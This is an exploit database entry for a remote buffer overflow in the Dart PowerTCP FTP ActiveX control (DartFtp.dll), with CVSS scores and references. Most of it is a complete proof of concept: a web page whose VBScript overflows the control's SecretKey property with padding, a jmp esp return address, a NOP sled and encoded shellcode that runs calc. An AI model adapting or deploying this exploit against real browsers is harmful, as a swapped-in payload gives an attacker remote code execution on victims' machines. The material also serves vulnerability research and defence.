Dart Communications PowerTCP FTP module Remote BOF Exploit

2008.10.22
Credit: Intel
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

<html> <pre> Author: Intel Discovered by: Intel Software: PowerTCP ActiveX Vulnerable Component: DartFtp.dll Version: 2.0.2.0 Website: www.dart.com Description: "PowerTCP tools from Dart Communications are comprehensive tools you can include in your programs to perform common TCP/IP functions, including FTP, HTTP, SMTP, POP3, telnet, and SNMP. In addition, Dart supplies a series of other tools, such as a Zip compressor and a VT320 terminal emulator. This review, however, will focus only on two tools: the FTP Tool and the Mail Tool, which supports SMTP and POP3." RegKey Safe for Script: False RegkeySafe for Init: True KillBitSet: False Tested on Vista SP1 fully patched and IE7 <object classid='clsid:39FDA070-61BA-11D2-AD84-00105A17B608' id='pwn'></object> <input language=VBScript onclick=Launch() type=button value="Launch Exploit"> <script language = 'vbscript'> Sub Launch buff = String (1684, "A") RET = unescape("%5F%DC%02%10%cc") //jmp esp in DartFtp.DLL, we added in int3 because without it our nop sled would cause an access violation nop = String(22, unescape("%90")) //Exec Calc Scode shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49" & _ "%48%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%43" & _ "%58%30%42%31%50%42%41%6b%42%41%53%42%32%42%41%32" & _ "%41%41%30%41%41%58%50%38%42%42%75%48%69%6b%4c%4d" & _ "%38%63%74%75%50%33%30%67%70%4c%4b%73%75%57%4c%6e" & _ "%6b%63%4c%45%55%63%48%33%31%58%6f%6c%4b%70%4f%77" & _ "%68%6e%6b%73%6f%71%30%65%51%6a%4b%72%69%4e%6b%36" & _ "%54%4e%6b%45%51%4a%4e%46%51%6b%70%4f%69%4c%6c%6e" & _ "%64%59%50%73%44%53%37%58%41%7a%6a%54%4d%33%31%78" & _ "%42%48%6b%7a%54%77%4b%52%74%66%44%34%44%62%55%59" & _ "%75%6e%6b%41%4f%36%44%45%51%6a%4b%53%56%4c%4b%46" & _ "%6c%72%6b%4c%4b%53%6f%37%6c%63%31%6a%4b%4e%6b%75" & _ "%4c%6c%4b%54%41%48%6b%4d%59%51%4c%51%34%34%44%4a" & _ "%63%30%31%6f%30%62%44%4e%6b%71%50%54%70%4b%35%6b" & _ "%70%50%78%46%6c%6c%4b%63%70%44%4c%4c%4b%44%30%35" & _ "%4c%6e%4d%6c%4b%61%78%55%58%6a%4b%64%49%4e%6b%6b" & _ "%30%6c%70%57%70%57%70%47%70%4c%4b%70%68%47%4c%71" & _ "%4f%44%71%6b%46%33%50%66%36%4f%79%4c%38%6e%63%4f" & _ "%30%71%6b%30%50%41%78%58%70%6c%4a%53%34%51%4f%33" & _ "%58%4e%78%39%6e%6d%5a%46%6e%61%47%4b%4f%69%77%63" & _ "%53%45%6a%33%6c%72%57%30%69%50%6e%62%44%70%6f%73" & _ "%47%41%63%41%4c%50%73%42%59%31%63%50%74%65%35%70" & _ "%6d%54%73%65%62%33%6c%30%63%41%71%70%6c%53%53%66" & _ "%4e%31%75%74%38%70%65%77%70%43") naughtybuffer = buff + ret + nop + shellcode + nop pwn.SecretKey = naughtybuffer End Sub </script> </html>

References:

http://xforce.iss.net/xforce/xfdb/45975
http://www.securityfocus.com/bid/31814
http://www.milw0rm.com/exploits/6793


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top